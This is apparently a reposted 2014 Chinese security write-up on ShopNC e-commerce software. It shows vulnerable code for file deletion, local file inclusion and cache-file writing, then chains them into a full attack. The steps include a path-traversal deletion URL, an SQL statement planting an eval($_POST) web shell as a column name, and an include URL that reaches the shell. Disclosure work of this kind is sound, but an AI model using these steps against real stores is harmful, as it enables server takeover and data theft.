电子商务系统ShopNC多个漏洞(可暴力 getshell)

前言

ShopNC是一款S是网城创想公司旗下服务于企业客户的电子商务系统,基于PHP5技术采用MVC 模式开发,本文介绍了shopnc多个漏洞结合,可getshell有点暴力-_-

任意文件删除

文件 control\store.php 1438 行 (还有几个同样的地方,新版已修复)

........
$model_upload = Model('upload');        
$file_info = $model_upload->getOneUpload(intval($_GET['file_id']));        
if(!$file_info){            
  @unlink(ATTACH_SLIDE.DS.$_GET['img_src']);        
}else{ 
........

本地文件包含

文件 /framework/core/base.php 71行

$act_file = realpath( BasePath.DS."control".DS.$_GET['act'].".php" ); }    
if ( is_file( $act_file ) ) {        
  require( $act_file );        
  $class_name = $_GET['act']."Control";        
  if ( class_exists( $class_name ) )

后台更新缓存写shell

文件 model/adv_model.php 416 行

public function makeAdvCache($adv){        
  $lang = Language::getLangContent();        
  $tmp .= "<?php \r\n";        
  $tmp .= "defined('InShopNC') or exit('Access Invalid!'); \r\n";        
  if (is_numeric($adv) && $adv > 0){ 
    $condition['adv_id'] = $adv;            
    $adv_info = $this->getList($condition);            
    $adv = $adv_info['0'];        
  }    
..................................                       
$content = addslashes($v);            
$content = str_replace('$','\$',$content); //防止有$符号被解析成变量            
$tmp .= '$'.$k." = \"".$content."\"; \r\n";
}        
// 缓存文件存放位置及文件名        
$cache_file = BasePath.'/cache/adv/adv_'.$adv['adv_id'].'.cache.php';        
file_put_contents($cache_file,$tmp);

继续跟进getList函数

public function getList($condition=array(), $page='', $limit='', $orderby=''){    
  $param = array();    
  $param['table'] = 'adv';   
  $param['field'] = $condition['field']?$condition['field']:'*';    
  $param['where'] = $this->getCondition($condition);    
  if($orderby == ''){        
    $param['order'] = 'slide_sort, adv_id desc';    
  }else{        
    $param['order'] = $orderby;    
  }    
  $param['limit'] = $limit;    
  return Db::select($param,$page);
}

写文件时,从数据库中遍历key,跟value 未过滤key,key 可以从数据库读取,当有数据库可控时,即可写入任意文件.

ShopNc GetShell

结合以上三个漏洞,即可优雅的 getshell

流程

任意文件删除 => 重装 => 更改数据库 shopnc_adv 键值 =>更新广告缓存 =>getshell

具体步骤

1:http://www.xxx.com/index.php?act=store&op=dorp_img&file_id=16&img_src=/../../../install/lock

2:重装系统

3:进入MySQL 执行sql ALTER TABLE `shopnc_adv` ADD `{eval($_POST[1])}` VARCHAR( 100 ) NOT NULL

4:进入后台 更新广告缓存 http://www.xxx.com/admin/index.php?act=adv&op=adv_edit&adv_id=14

5:连接shell http://www.xxx.com/index.php?act=../cache/adv/adv_14.cache

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2014-03-11

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏Java成神之路

mysql_异常_01_Access denied for user 'root'@'192.168.1.13' (using password: YES)

使用navicat premuim 连接 虚拟机mysql数据库时 ,抛出如下错误:

903
来自专栏乐沙弥的世界

RMAN 概述及其体系结构

是一种用于集备份(backup)、还原(restore)和恢复(recover)数据库于一体的Oracle 工具,支持命令行及图形界面操作

971
来自专栏全栈架构

elasticsearch5xx使用logstash同步mysql

下载地址:https://www.elastic.co/downloads/logstash

874
来自专栏Python、Flask、Django

Ajax与php进行数据交互

1602
来自专栏流媒体

Linux下Mysql安装配置

安装包 这里以centos 6.8 为例。下载Bundle包。然后解压:

1611
来自专栏散尽浮华

Mysql备份系列(1)--备份方案总结性梳理

mysql数据库备份有多么重要已不需过多赘述了,废话不多说!以下总结了mysql数据库的几种备份方案: 一、binlog二进制日志通常作为备份的重要资源,所以再...

6959
来自专栏软件开发 -- 分享 互助 成长

openfire中mysql的前期设置

使用openfire的时候如果需要使用自己的mysql数据库,需要提前进行设置,下面将记录下,基本的设置过程。 一、前期准备工作: 1、先下载两个工具一个是my...

19510
来自专栏窗户

C语言/原子/编译,你真的明白了吗?

  说到原子,类似于以下的代码可能人人都可以看出猫腻。 /* http://www.cnblogs.com/Colin-Cai */ #include <std...

2229
来自专栏前端vue

对数据进行一些基本操作(四)

完整代码 ↓ ↓ ↓ ↓ github地址:https://github.com/jgsrty/jianshu_node 码云地址:https://gite...

1654
来自专栏C/C++基础

MySQL设置远程访问

在MySQL Server端,执行mysql 命令进入mysql 命令模式。使用grant命令用来建立新用户,指定用户口令并增加用户权限。命令格式如下:

1591

扫码关注云+社区

领取腾讯云代金券